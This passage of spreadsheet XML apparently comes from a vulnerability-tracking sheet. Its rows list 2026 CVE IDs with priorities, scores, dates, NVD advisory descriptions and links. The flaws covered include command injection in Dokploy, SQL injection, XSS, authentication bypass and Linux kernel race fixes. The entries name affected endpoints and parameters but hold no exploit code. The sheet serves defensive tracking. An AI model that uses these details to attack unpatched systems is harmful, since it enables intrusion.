          <t>Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, dockerContextPath accepted by apps/dokploy/components/dashboard/application/build/show.tsx flows through getDockerContextPath in packages/server/src/utils/filesystem/directory.ts into the unquoted cd command in packages/server/src/utils/builders/docker-file.ts before execution by execAsync, allowing an authenticated application editor to execute arbitrary commands on the Dokploy host. This issue is fixed in version 0.29.13.</t>
        </is>
      </c>
      <c r="M6081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72885</t>
        </is>
      </c>
    </row>
    <row r="6082">
      <c r="A6082" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6082" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73392</t>
        </is>
      </c>
      <c r="C6082" s="5" t="inlineStr"/>
      <c r="D6082" s="5" t="inlineStr"/>
      <c r="E6082" s="5" t="inlineStr"/>
      <c r="F6082" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G6082" s="5" t="inlineStr"/>
      <c r="H6082" s="5" t="inlineStr"/>
      <c r="I6082" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J6082" s="5" t="inlineStr"/>
      <c r="K6082" s="5" t="inlineStr"/>
      <c r="L6082" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority. Duplicate to CVE-2026-12965.</t>
        </is>
      </c>
      <c r="M6082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73392</t>
        </is>
      </c>
    </row>
    <row r="6083">
      <c r="A6083" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6083" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75167</t>
        </is>
      </c>
      <c r="C6083" s="5" t="inlineStr"/>
      <c r="D6083" s="5" t="inlineStr"/>
      <c r="E6083" s="5" t="inlineStr"/>
      <c r="F6083" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6083" s="5" t="inlineStr"/>
      <c r="H6083" s="5" t="inlineStr"/>
      <c r="I6083" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6083" s="5" t="inlineStr"/>
      <c r="K6083" s="5" t="inlineStr"/>
      <c r="L6083" s="5" t="inlineStr">
        <is>
          <t>A broken access control vulnerability in the ugw-usr-edit method of /cgi-bin/wwwugw.cgi in MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with the low-privileged Standard role to change the password of arbitrary accounts.</t>
        </is>
      </c>
      <c r="M6083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75167</t>
        </is>
      </c>
    </row>
    <row r="6084">
      <c r="A6084" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6084" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75171</t>
        </is>
      </c>
      <c r="C6084" s="5" t="inlineStr"/>
      <c r="D6084" s="5" t="inlineStr"/>
      <c r="E6084" s="5" t="inlineStr"/>
      <c r="F6084" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6084" s="5" t="inlineStr"/>
      <c r="H6084" s="5" t="inlineStr"/>
      <c r="I6084" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6084" s="5" t="inlineStr"/>
      <c r="K6084" s="5" t="inlineStr"/>
      <c r="L6084" s="5" t="inlineStr">
        <is>
          <t>An issue in HubCore v.14.1.1 allows a remote attacker to escalate privileges via the HUBCOREID session cookie handling component.</t>
        </is>
      </c>
      <c r="M6084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75171</t>
        </is>
      </c>
    </row>
    <row r="6085">
      <c r="A6085" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6085" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75308</t>
        </is>
      </c>
      <c r="C6085" s="5" t="inlineStr"/>
      <c r="D6085" s="5" t="inlineStr"/>
      <c r="E6085" s="5" t="inlineStr"/>
      <c r="F6085" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6085" s="5" t="inlineStr"/>
      <c r="H6085" s="5" t="inlineStr"/>
      <c r="I6085" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6085" s="5" t="inlineStr"/>
      <c r="K6085" s="5" t="inlineStr"/>
      <c r="L6085" s="5" t="inlineStr">
        <is>
          <t>yshopmall &lt;=3.3 is vulnerable to Cross Site Scripting (XSS). The file upload endpoint /api/upload of the system lacks file type validation. Attackers can upload files of any type, including HTML, JSP, and other executable files.</t>
        </is>
      </c>
      <c r="M6085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75308</t>
        </is>
      </c>
    </row>
    <row r="6086">
      <c r="A6086" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6086" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75429</t>
        </is>
      </c>
      <c r="C6086" s="5" t="inlineStr"/>
      <c r="D6086" s="5" t="inlineStr"/>
      <c r="E6086" s="5" t="inlineStr"/>
      <c r="F6086" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G6086" s="5" t="inlineStr"/>
      <c r="H6086" s="5" t="inlineStr"/>
      <c r="I6086" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6086" s="5" t="inlineStr"/>
      <c r="K6086" s="5" t="inlineStr"/>
      <c r="L6086" s="5" t="inlineStr">
        <is>
          <t>PowerJob versions 4.x through 5.1.2 contain an unauthenticated remote code execution vulnerability in the /friend/process endpoint of the Server-Worker transport layer</t>
        </is>
      </c>
      <c r="M6086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75429</t>
        </is>
      </c>
    </row>
    <row r="6087">
      <c r="A6087" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6087" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75439</t>
        </is>
      </c>
      <c r="C6087" s="5" t="inlineStr"/>
      <c r="D6087" s="5" t="inlineStr"/>
      <c r="E6087" s="5" t="inlineStr"/>
      <c r="F6087" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6087" s="5" t="inlineStr"/>
      <c r="H6087" s="5" t="inlineStr"/>
      <c r="I6087" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6087" s="5" t="inlineStr"/>
      <c r="K6087" s="5" t="inlineStr"/>
      <c r="L6087" s="5" t="inlineStr">
        <is>
          <t>An issue in Free5GC v.4.2.2 allows a remote attacker to cause a denial of service via the UPF component</t>
        </is>
      </c>
      <c r="M6087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75439</t>
        </is>
      </c>
    </row>
    <row r="6088">
      <c r="A6088" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6088" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7809</t>
        </is>
      </c>
      <c r="C6088" s="5" t="inlineStr"/>
      <c r="D6088" s="5" t="inlineStr"/>
      <c r="E6088" s="5" t="inlineStr"/>
      <c r="F6088" s="5" t="inlineStr"/>
      <c r="G6088" s="5" t="inlineStr"/>
      <c r="H6088" s="5" t="inlineStr"/>
      <c r="I6088" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6088" s="5" t="inlineStr"/>
      <c r="K6088" s="5" t="inlineStr"/>
      <c r="L6088" s="5" t="inlineStr">
        <is>
          <t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t>
        </is>
      </c>
      <c r="M6088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7809</t>
        </is>
      </c>
    </row>
    <row r="6089">
      <c r="A6089" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6089" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78849</t>
        </is>
      </c>
      <c r="C6089" s="5" t="inlineStr"/>
      <c r="D6089" s="5" t="inlineStr"/>
      <c r="E6089" s="5" t="inlineStr"/>
      <c r="F6089" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G6089" s="5" t="inlineStr"/>
      <c r="H6089" s="5" t="inlineStr"/>
      <c r="I6089" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6089" s="5" t="inlineStr"/>
      <c r="K6089" s="5" t="inlineStr"/>
      <c r="L6089" s="5" t="inlineStr">
        <is>
          <t>Cross Site Scripting vulnerability in Netgate pfSense Plus software versions &lt;= 26.03 pfSense CE software versions &lt;= 2.8.1 allows a remote attacker to execute arbitrary code via the captive_portal_status.widget.php file</t>
        </is>
      </c>
      <c r="M6089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78849</t>
        </is>
      </c>
    </row>
    <row r="6090">
      <c r="A6090" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6090" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78971</t>
        </is>
      </c>
      <c r="C6090" s="5" t="inlineStr"/>
      <c r="D6090" s="5" t="inlineStr"/>
      <c r="E6090" s="5" t="inlineStr"/>
      <c r="F6090" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6090" s="5" t="inlineStr"/>
      <c r="H6090" s="5" t="inlineStr"/>
      <c r="I6090" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6090" s="5" t="inlineStr"/>
      <c r="K6090" s="5" t="inlineStr"/>
      <c r="L6090" s="5" t="inlineStr">
        <is>
          <t>In Halo &lt;= 2.25.4, the plugin management feature allows users to install/update malicious plugins, which could let attackers execute any command with Halo process permissions.</t>
        </is>
      </c>
      <c r="M6090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78971</t>
        </is>
      </c>
    </row>
    <row r="6091">
      <c r="A6091" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6091" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79379</t>
        </is>
      </c>
      <c r="C6091" s="5" t="inlineStr"/>
      <c r="D6091" s="5" t="inlineStr"/>
      <c r="E6091" s="5" t="inlineStr"/>
      <c r="F6091" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6091" s="5" t="inlineStr"/>
      <c r="H6091" s="5" t="inlineStr"/>
      <c r="I6091" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6091" s="5" t="inlineStr"/>
      <c r="K6091" s="5" t="inlineStr"/>
      <c r="L6091" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow in the SBC_DecodeFrames() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier and fixed in v.5.0 allows attackers to cause a Denial of Service (DoS) via sending a crafted frame.</t>
        </is>
      </c>
      <c r="M6091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79379</t>
        </is>
      </c>
    </row>
    <row r="6092">
      <c r="A6092" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6092" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79387</t>
        </is>
      </c>
      <c r="C6092" s="5" t="inlineStr"/>
      <c r="D6092" s="5" t="inlineStr"/>
      <c r="E6092" s="5" t="inlineStr"/>
      <c r="F6092" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G6092" s="5" t="inlineStr"/>
      <c r="H6092" s="5" t="inlineStr"/>
      <c r="I6092" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J6092" s="5" t="inlineStr"/>
      <c r="K6092" s="5" t="inlineStr"/>
      <c r="L6092" s="5" t="inlineStr">
        <is>
          <t>SQL injection vulnerability in PbootCMS versions 3.2.0 through 3.2.5 allows an authenticated user to modify arbitrary user account fields (including passwords and roles) via crafted parameters to the User/mod interface, enabling account takeover.</t>
        </is>
      </c>
      <c r="M6092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79387</t>
        </is>
      </c>
    </row>
    <row r="6093">
      <c r="A6093" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6093" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79389</t>
        </is>
      </c>
      <c r="C6093" s="5" t="inlineStr"/>
      <c r="D6093" s="5" t="inlineStr"/>
      <c r="E6093" s="5" t="inlineStr"/>
      <c r="F6093" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6093" s="5" t="inlineStr"/>
      <c r="H6093" s="5" t="inlineStr"/>
      <c r="I6093" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6093" s="5" t="inlineStr"/>
      <c r="K6093" s="5" t="inlineStr"/>
      <c r="L6093" s="5" t="inlineStr">
        <is>
          <t>Trueview T18161 S 6.0.23.4 contains an improper verification in MQTT command processing. An attacker with network access can replay or modify captured MQTT messages, including security-related nonce, timestamp, and signature fields, and the device accepts the modified messages and executes the associated commands.</t>
        </is>
      </c>
      <c r="M6093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79389</t>
        </is>
      </c>
    </row>
    <row r="6094">
      <c r="A6094" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6094" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79573</t>
        </is>
      </c>
      <c r="C6094" s="5" t="inlineStr"/>
      <c r="D6094" s="5" t="inlineStr"/>
      <c r="E6094" s="5" t="inlineStr"/>
      <c r="F6094" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6094" s="5" t="inlineStr"/>
      <c r="H6094" s="5" t="inlineStr"/>
      <c r="I6094" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6094" s="5" t="inlineStr"/>
      <c r="K6094" s="5" t="inlineStr"/>
      <c r="L6094" s="5" t="inlineStr">
        <is>
          <t>L-ONE v1.0.0 was discovered to contain multiple SQL injection vulnerabilities in the /attachment/getBusinessUploadList component via the busid, id, and taskid parameters. This vulnerability allows attackers to access sensitive database information via a crafted SQL statement.</t>
        </is>
      </c>
      <c r="M6094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79573</t>
        </is>
      </c>
    </row>
    <row r="6095">
      <c r="A6095" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79577</t>
        </is>
      </c>
      <c r="C6095" s="5" t="inlineStr"/>
      <c r="D6095" s="5" t="inlineStr"/>
      <c r="E6095" s="5" t="inlineStr"/>
      <c r="F6095" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6095" s="5" t="inlineStr"/>
      <c r="H6095" s="5" t="inlineStr"/>
      <c r="I6095" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J6095" s="5" t="inlineStr"/>
      <c r="K6095" s="5" t="inlineStr"/>
      <c r="L6095" s="5" t="inlineStr">
        <is>
          <t>An issue in the /cas/login component of sso-master v1.0.0 allows attackers to authenticate into the application without a password via sending a crafted POST request.</t>
        </is>
      </c>
      <c r="M6095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79577</t>
        </is>
      </c>
    </row>
    <row r="6096">
      <c r="A6096" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79590</t>
        </is>
      </c>
      <c r="C6096" s="5" t="inlineStr"/>
      <c r="D6096" s="5" t="inlineStr"/>
      <c r="E6096" s="5" t="inlineStr"/>
      <c r="F6096" s="5" t="inlineStr"/>
      <c r="G6096" s="5" t="inlineStr"/>
      <c r="H6096" s="5" t="inlineStr"/>
      <c r="I6096" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6096" s="5" t="inlineStr"/>
      <c r="K6096" s="5" t="inlineStr"/>
      <c r="L6096" s="5" t="inlineStr">
        <is>
          <t>A NULL pointer dereference vulnerability exists in the Prism parser component of mruby 4.0.0. An attacker can provide a specially crafted Ruby source file that triggers the parser to pass a NULL pointer to nonnull string handling functions, resulting in undefined behavior and application crash.</t>
        </is>
      </c>
      <c r="M6096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79590</t>
        </is>
      </c>
    </row>
    <row r="6097">
      <c r="A6097" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79591</t>
        </is>
      </c>
      <c r="C6097" s="5" t="inlineStr"/>
      <c r="D6097" s="5" t="inlineStr"/>
      <c r="E6097" s="5" t="inlineStr"/>
      <c r="F6097" s="5" t="inlineStr"/>
      <c r="G6097" s="5" t="inlineStr"/>
      <c r="H6097" s="5" t="inlineStr"/>
      <c r="I6097" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6097" s="5" t="inlineStr"/>
      <c r="K6097" s="5" t="inlineStr"/>
      <c r="L6097" s="5" t="inlineStr">
        <is>
          <t>A heap-buffer-overflow and use-after-free vulnerability exists in the xls_getCSS() function of libxls 1.6.3 due to insufficient validation of a file-controlled font index.</t>
        </is>
      </c>
      <c r="M6097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79591</t>
        </is>
      </c>
    </row>
    <row r="6098">
      <c r="A6098" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79592</t>
        </is>
      </c>
      <c r="C6098" s="5" t="inlineStr"/>
      <c r="D6098" s="5" t="inlineStr"/>
      <c r="E6098" s="5" t="inlineStr"/>
      <c r="F6098" s="5" t="inlineStr"/>
      <c r="G6098" s="5" t="inlineStr"/>
      <c r="H6098" s="5" t="inlineStr"/>
      <c r="I6098" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J6098" s="5" t="inlineStr"/>
      <c r="K6098" s="5" t="inlineStr"/>
      <c r="L6098" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read vulnerability exists in the xls_dumpSummary() function of libxls 1.6.3 due to insufficient validation of file-controlled OLE summary offsets.</t>
        </is>
      </c>
      <c r="M6098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79592</t>
        </is>
      </c>
    </row>
    <row r="6099">
      <c r="A6099" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80841</t>
        </is>
      </c>
      <c r="C6099" s="5" t="inlineStr"/>
      <c r="D6099" s="5" t="inlineStr"/>
      <c r="E6099" s="5" t="inlineStr"/>
      <c r="F6099" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6099" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6099" s="5" t="inlineStr"/>
      <c r="I6099" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6099" s="5" t="inlineStr"/>
      <c r="K6099" s="5" t="inlineStr"/>
      <c r="L6099" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/packet: defer vmalloc TX_RING free until skbs finish
AF_PACKET TX_RING skbs keep a raw pointer to their ring frame. The skb
page references preserve page-backed ring blocks after pg_vec is freed,
but they do not preserve a vmalloc mapping.
tpacket_destruct_skb() currently drops the pending reference before
writing the timestamp and TP_STATUS_AVAILABLE to the frame. Move the
decrement after those stores. The smp_wmb() in __packet_set_status()
orders the frame stores before the decrement.
Also recheck pending TX frames under pg_vec_lock before non-closing
ring replacement, so a racing send cannot add a pending skb between
the initial check and the ring swap.
Ring allocation can produce a mixture of page-backed and vmalloc-backed
blocks. Allocate deferred-work storage during TX ring setup when the
first vmalloc-backed block is encountered, and keep its pointer in the
pg_vec allocation header. If allocation fails, return -ENOMEM from ring
setup. On socket close, a non-NULL pointer identifies a vmalloc-backed
vector without a scan. If TX skbs remain, defer the whole vector to
system_long_wq.
After pg_vec is detached, a late destructor can skip the pending
decrement. Use socket write-memory accounting as the deferred lifetime
gate instead: an skb remains charged through its final sock_wfree(),
after all ring-frame accesses. The delayed work retains a socket
reference and reschedules itself until no TX skbs remain.
Move pending_refcnt release to packet_sock_destruct() so late skb
destructors and deferred cleanup can safely use it after
packet_release(). Page-backed teardown remains synchronous, and no lock
is added to the TX completion hot path.</t>
        </is>
      </c>
      <c r="M6099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80841</t>
        </is>
      </c>
    </row>
    <row r="6100">
      <c r="A6100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80847</t>
        </is>
      </c>
      <c r="C6100" s="5" t="inlineStr"/>
      <c r="D6100" s="5" t="inlineStr"/>
      <c r="E6100" s="5" t="inlineStr"/>
      <c r="F6100" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6100" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6100" s="5" t="inlineStr"/>
      <c r="I6100" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6100" s="5" t="inlineStr"/>
      <c r="K6100" s="5" t="inlineStr"/>
      <c r="L6100" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tcp: clamp route advmss to TCP_MIN_MSS
tcp_select_initial_window() assumes that callers never pass an MSS
smaller than 1, but route-derived advmss values can violate that
assumption.
A too-small explicit RTAX_ADVMSS is one way to get there, but it is not
the only one. The same divide-by-zero can also be reached through the
"default advmss" path when RTAX_ADVMSS is left at 0 and the effective
advmss is later driven down by route MTU and min_adv_mss.
Introduce a tcp_dst_advmss() helper that clamps route advmss to
TCP_MIN_MSS before TCP consumes it, and use it in the TCP paths that
derive advmss from dst metrics. This keeps the effective MSS from
dropping to zero before tcp_select_initial_window() rounds the receive
window.</t>
        </is>
      </c>
      <c r="M6100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80847</t>
        </is>
      </c>
    </row>
    <row r="6101">
      <c r="A6101" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80858</t>
        </is>
      </c>
      <c r="C6101" s="5" t="inlineStr"/>
      <c r="D6101" s="5" t="inlineStr"/>
      <c r="E6101" s="5" t="inlineStr"/>
      <c r="F6101" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6101" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6101" s="5" t="inlineStr"/>
      <c r="I6101" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6101" s="5" t="inlineStr"/>
      <c r="K6101" s="5" t="inlineStr"/>
      <c r="L6101" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fuse: publish io-uring queues with release semantics
fuse_uring_create_queue() initializes a fuse_ring_queue and then
publishes the pointer into ring-&gt;queues[qid] with WRITE_ONCE() under the
fch-&gt;lock. There are several readers that may concurrently be fetching
that pointer locklessly and then deferencing it.
WRITE_ONCE() doesn't ensure ordering of the queue's field
initialization before the ring-&gt;queues[qid] pointer assignment. The
queue must be published with smp_store_release() so the field
initialization is guaranteed to happen before.
Readers in paths where the read may happen concurrently with the store
need to use READ_ONCE() because any race involving a plain access is
undefined.</t>
        </is>
      </c>
      <c r="M6101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80858</t>
        </is>
      </c>
    </row>
    <row r="6102">
      <c r="A6102" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80859</t>
        </is>
      </c>
      <c r="C6102" s="5" t="inlineStr"/>
      <c r="D6102" s="5" t="inlineStr"/>
      <c r="E6102" s="5" t="inlineStr"/>
      <c r="F6102" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6102" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6102" s="5" t="inlineStr"/>
      <c r="I6102" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6102" s="5" t="inlineStr"/>
      <c r="K6102" s="5" t="inlineStr"/>
      <c r="L6102" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fuse: fix missing barrier when checking io-uring readiness
fuse_block_alloc() reads fch-&gt;initialized and then fch-&gt;io_uring.
fch-&gt;io_uring is set before fch-&gt;initialized, ordered by the smp_wmb()
in fuse_chan_set_intialized(), but fuse_block_alloc() has no matching
read barrier between the two loads.
This may lead a CPU to observe fch-&gt;initialized=1 but fch-&gt;io_uring=0,
and skip the check that blocks request allocation until the io-uring
queues are ready. This can reintroduce the lock-order inversion deadlock
that commit 3393ff964e0f prevents.
Add an smp_rmb() barrier to pair with the smp_wmb() in
fuse_chan_set_initialized() to prevent this.</t>
        </is>
      </c>
      <c r="M6102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80859</t>
        </is>
      </c>
    </row>
    <row r="6103">
      <c r="A6103" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80860</t>
        </is>
      </c>
      <c r="C6103" s="5" t="inlineStr"/>
      <c r="D6103" s="5" t="inlineStr"/>
      <c r="E6103" s="5" t="inlineStr"/>
      <c r="F6103" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G6103" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6103" s="5" t="inlineStr"/>
      <c r="I6103" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6103" s="5" t="inlineStr"/>
      <c r="K6103" s="5" t="inlineStr"/>
      <c r="L6103" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fuse: fix race between interrupt and resend
After commit f8fce75fedf7 ("fuse: clear intr_entry in fuse_resend and
fuse_remove_pending_req") the WARN_ON(!list_empty(&amp;req-&gt;intr_entry)) in
fuse_request_free() still triggers due to the following race:
In request_wait_answer()
  if (test_bit(FR_SENT, &amp;req-&gt;flags)) -&gt; returns true
In fuse_chan_resend()
  clear_bit(FR_SENT, &amp;req-&gt;flags)
In request_wait_answer()
  queue_interrupt(req)
Fix by:
 - move clearing FR_SENT inside fpq-&gt;lock
 - move setting FR_PENDING inside fiq-&gt;lock
 - recheck FR_SENT after acquiring fiq-&gt;lock in fuse_dev_queue_interrupt()</t>
        </is>
      </c>
      <c r="M6103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80860</t>
        </is>
      </c>
    </row>
    <row r="6104">
      <c r="A6104" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B6104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80861</t>
        </is>
      </c>
      <c r="C6104" s="5" t="inlineStr"/>
      <c r="D6104" s="5" t="inlineStr"/>
      <c r="E6104" s="5" t="inlineStr"/>
      <c r="F6104" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G6104" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H6104" s="5" t="inlineStr"/>
      <c r="I6104" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J6104" s="5" t="inlineStr"/>
      <c r="K6104" s="5" t="inlineStr"/>
      <c r="L6104" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: xhci: bail out of setup if the controller is inaccessible
xhci_gen_setup() locates the operational registers using the capability
length read from the very first register:
	xhci-&gt;op_regs = hcd-&gt;regs +
		HC_LENGTH(readl(&amp;xhci-&gt;cap_regs-&gt;hc_capbase));
If the controller is dead or has dropped off the bus, that read returns
